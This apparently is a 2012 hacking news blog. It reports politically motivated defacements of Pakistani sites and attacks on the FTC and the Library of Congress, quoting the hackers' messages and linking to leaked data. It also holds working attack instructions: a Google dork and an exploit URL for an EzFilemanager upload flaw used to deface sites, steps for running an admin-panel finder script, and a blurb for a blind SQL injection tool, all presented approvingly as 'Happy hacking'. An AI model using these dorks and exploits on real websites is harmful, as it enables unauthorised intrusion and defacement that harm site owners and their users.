Thursday, 26 January 2012

100+ pakistani website got hacked by ICA-INDISHELL

Capture

Once again Pakistani cyberspace hit by ICA-INDISHELL.This time FfeSsxt Prince, H3r0 and Magnum Sniper have hacked 40+ pakistani websites. The message they have posted on the defacepage is as follow
We arent afraid of any shit that comes to us !! We'll Do anything to Keep our Country's Pride Up and High !! Jihaad = War = Shit. One Person gives u bayaan on Jihaad and encourages you to kill people and says "ye sawaab ka kaam hai","rizzak ka kaam hai" and you do sins even without thinking the consequences !! But you Dony Know Tht Terrorism is unnecessary violence against innocent civilians; Qur'aan forbids this. You have read the Qur'aan, you should know this & yet if you are supporting Terrorism means you are'nt Muslim.We are Proud of People we have in India who are ready to deal with any such incidents !! Officers, Soldiers who are ready to die for their Motherland .

they have posted the list of websites on pastebin.

click here to see the list

Tuesday, 24 January 2012

FTC OWNED BY ANTISEC

FTC OWNED BY ANTISEC

After the Library of Congress , FTC OWNED BY ANTISEC due to SOPA / PIPA / ACTA .
They have posted the message on paste-bin “ If SOPA/PIPA/ACTA passes we will wage a relentless war against the corporate internet, destroying dozens upon dozens of government and company websites. As you are reading this we are amassing our allied armies of darkness, preparing boatloads of stolen booty for our next raid. We are sitting on hundreds of rooted servers,getting ready to drop all your mysql dumps and mail spools. Your passwords? Your precious bank accounts? Even your online dating details?! You ain't even trying to step to this.”


ftc_logo copy
You can see leaked data here

Saturday, 21 January 2012

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD

mega

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD. Fbi have shutdown the megaupload due to SOPA and the Anonymous have ddosed FBI.gov after that today SECTOR 404 have hacked Library of Congress you can see the leaked data here.

Wednesday, 18 January 2012

THA (The Hackers Army) official website got hacked !!

The hackers army have hacked more then 1K innocent sites for #op free PALESTAIN and they have challenged to the HaXroot and they have told that “ HaXroot you are noob !! ” and after that the official website of Tha (the hackers army) got hacked by Hacked by HaX.R00T ,CFR Robot Pirate and Pakos Hacker !!




Capture

Haxroot have posted the snapshot of the comments !!

you can see the hacked website and mirror here

website : http://www.thehackersarmy.net/

mirror : http://www.zone-hack.com/defacements/?id=39294

Wednesday, 11 January 2012

Admin finder perl script

1 copy
The things you need
1. Active perl (click here to download)
2. admin finder script (click here to download )
Install the active perl and extract the archive in to “c:\perl\bin” now go to start > run and type CMD and hit enter now type “cd c:\perl\bin” and hit enter after that paste the perl script name “admin_CP_finder.pl ” and just hit enter now enter the site which you want to find admin penal and hit enter (I have hide my site) and now enter the source code of the website (my site have asp source code so I have added 2) and just hit enter. you will found the admin penal. Happy hacking.

Monday, 9 January 2012

Blind Cat: A Blind SQL Injection Exploitation Tool

Blind Cat: A Blind SQL Injection Exploitation Tool

Blind Cat is not a fully automated tool, the ones we call – “one click ownage“. You are the driving force behind this tool. Once, you understand how this tool works, you will be able to exploit a lot more difficult SQL injections easily. Consider this tool as an automation tool/front-end for manual blind SQL injections.





Thursday, 5 January 2012

EzFilemanager Deface Upload vulnerability

CaptureGoogle dork for EzFilemanager is “ inurl:ezfilemanager/ezfilemanager.php

(you can modify this dork for getting mor results from Google )

Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and

put ?sa=1&type=file after URL

now url will be : http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
now see the upload option and you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files

live Demo
result